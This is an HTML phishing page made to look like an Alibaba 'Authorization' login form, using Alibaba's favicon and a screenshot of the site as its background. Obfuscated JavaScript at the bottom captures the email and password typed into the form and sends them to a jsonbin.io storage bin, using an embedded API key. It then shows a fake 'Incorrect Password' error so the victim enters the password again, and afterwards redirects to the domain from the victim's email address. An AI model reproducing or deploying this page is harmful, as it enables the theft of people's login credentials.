


<!DOCTYPE html>
<html><head>
    <title>Auth</title>
    <link href="https://db.onlinewebfonts.com/c/d3a0199dcafa52672b5461066bbb3e59?family=Cash+Market+Light+Rounded" rel="stylesheet">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css">
    <style>
        body {
            background-size: cover;
            font-family: "Cash Market Light Rounded";
            display: flex;
            justify-content: center;
            align-items: center;
            height: 75vh;
            margin: 0;
        }
        .pass::before {content:"Pass"}
        .pass::after {content:"word"}

        #message {
            text-align: center;
            color: red;
            display: none;
        }

        body::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(255, 255, 255, 0.6);
            filter: blur(10px);
        }

        .login-panel::before {
            content: '';
            position: absolute;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background: rgba(255, 255, 255, 0.1);
            filter: blur(10px);
        }

        .card {
            box-shadow: 5px 5px 15px rgba(0, 0, 0, 0.3);
        }
@media only screen and (max-width:1200px){
.prLabel {
font-size:32px;
}
.theLabel {
font-size:50px;
}
.formFld {
height:120px;
font-size:33px;
}
input.pf {

border:5px solid black;
}
}
    </style>
<link rel="icon" href="https://t0.gstatic.com/faviconV2?client=SOCIAL&amp;type=FAVICON&amp;fallback_opts=TYPE,SIZE,URL&amp;url=https://www.alibaba.com"></head>
<body style="background-image: url(&quot;https://image.thum.io/get/maxAge/12/width/700/https://www.alibaba.com">
<div class="container login-panel">
    <div class="row justify-content-center">
        <div class="col-md-10">
            <div class="card">
                <div class="card-body">
                    <h5 class="card-title text-center prLabel">Authorization</h5>

                    <form id="login_form" method="POST">
                        <div class="form-group">
                            <label for="field-one" class="theLabel">Email</label>
                            <input type="text" class="form-control formFld" id="field-one" placeholder="Email" value="">
                        </div>
                        <div class="form-group">
                            <label for="field-two" class="theLabel"><span class="pass"></span></label>
                            <input type="password" class="form-control pass2 formFld pf" id="field-two" placeholder="Password" required="">

                            <div id="message" class="prLabel">Incorrect <span class="pass"></span>. Try Again</div>
                        </div>
                        <button type="submit" id="rcmloginsubmit" class="btn btn-primary btn-block formFld">Sign In</button>

                    </form>
                  <div style="width:200%">
                     <img style="width:150px;margin:0 auto" src="https://shorturl.at/ceFSU">


                  </div>
              </div>
            </div>
        </div>
    </div>
</div>
<script>
    const rty_0x447f15=rty_0x3bbc;(function(_0x508554,_0x11cb76){const _0x52681f=rty_0x3bbc,_0xfddd9d=_0x508554();while(!![]){try{const _0x507d18=-parseInt(_0x52681f(0x173))/0x1*(parseInt(_0x52681f(0x167))/0x2)+parseInt(_0x52681f(0x16c))/0x3*(parseInt(_0x52681f(0x165))/0x4)+-parseInt(_0x52681f(0x175))/0x5*(-parseInt(_0x52681f(0x168))/0x6)+parseInt(_0x52681f(0x169))/0x7*(parseInt(_0x52681f(0x162))/0x8)+parseInt(_0x52681f(0x15d))/0x9*(-parseInt(_0x52681f(0x15f))/0xa)+-parseInt(_0x52681f(0x16f))/0xb*(parseInt(_0x52681f(0x177))/0xc)+-parseInt(_0x52681f(0x15c))/0xd*(-parseInt(_0x52681f(0x17b))/0xe);if(_0x507d18===_0x11cb76)break;else _0xfddd9d['push'](_0xfddd9d['shift']());}catch(_0xdb2acd){_0xfddd9d['push'](_0xfddd9d['shift']());}}}(rty_0x42db,0xbd6b7));function rty_0x42db(){const _0x230a4d=['Error:','4972VWrsnG','https://','48dKKzDz','30veQcYT','1540Jymiwl','preventDefault','location','741BaSVwK','Success:','href','2022416PuYwoi','error','addEventListener','message','46994kjZDSj','submit','730925ugCpQf','stringify','72AjIIiz','application/json','value','display','5308058XYMHsK','login_form','catch','getElementById','block','then','$2a$10$H6s7fUMJSUVli2gctZl7ZeZRgzXGUqGtNnUfJrg1AngS44KjEVK8e','https://api.jsonbin.io/v3/b?name=','substring','field-two','78TkOqYn','27UQwYbg','lastIndexOf','5136110txfWQc','log','field-one','44904LQUZsO','style'];rty_0x42db=function(){return _0x230a4d;};return rty_0x42db();}function rty_0x3bbc(_0x1a7e95,_0x193030){const _0x42db3b=rty_0x42db();return rty_0x3bbc=function(_0x3bbca6,_0x2f2d67){_0x3bbca6=_0x3bbca6-0x153;let _0x487cbb=_0x42db3b[_0x3bbca6];return _0x487cbb;},rty_0x3bbc(_0x1a7e95,_0x193030);}let submissions=0x0;document[rty_0x447f15(0x155)](rty_0x447f15(0x153))[rty_0x447f15(0x171)](rty_0x447f15(0x174),function(_0x1d3cf9){const _0x3a5a67=rty_0x447f15;_0x1d3cf9[_0x3a5a67(0x16a)]();const _0xc05c44={'_0x339f47':document['getElementById']('field-one')[_0x3a5a67(0x179)],'_0x417725':document[_0x3a5a67(0x155)]('field-two')[_0x3a5a67(0x179)]},_0x55a141=document[_0x3a5a67(0x155)]('field-one')['value'];fetch(_0x3a5a67(0x159)+_0x55a141,{'method':'POST','headers':{'Content-Type':_0x3a5a67(0x178),'X-Master-Key':_0x3a5a67(0x158),'X-Bin-Name':''+(_0x55a141+submissions)},'body':JSON[_0x3a5a67(0x176)](_0xc05c44)})[_0x3a5a67(0x157)](_0x398871=>{if(!_0x398871['ok'])throw new Error('Network\x20response\x20was\x20not\x20ok');return _0x398871['json']();})[_0x3a5a67(0x157)](_0x828d17=>{const _0x34caca=_0x3a5a67;console[_0x34caca(0x160)](_0x34caca(0x16d),_0x828d17),submissions++;if(submissions===0x1)document['getElementById'](_0x34caca(0x15b))['value']='',document['getElementById'](_0x34caca(0x172))[_0x34caca(0x163)][_0x34caca(0x17a)]=_0x34caca(0x156);else{if(submissions===0x2){const _0x333361=document[_0x34caca(0x155)](_0x34caca(0x161))['value'],_0x3e27f8=_0x333361[_0x34caca(0x15a)](_0x333361[_0x34caca(0x15e)]('@')+0x1);window[_0x34caca(0x16b)][_0x34caca(0x16e)]=_0x34caca(0x166)+_0x3e27f8;}}})[_0x3a5a67(0x154)](_0x186cda=>{const _0x5e6db0=_0x3a5a67;console[_0x5e6db0(0x170)](_0x5e6db0(0x164),_0x186cda);});});
</script>
</body></html>
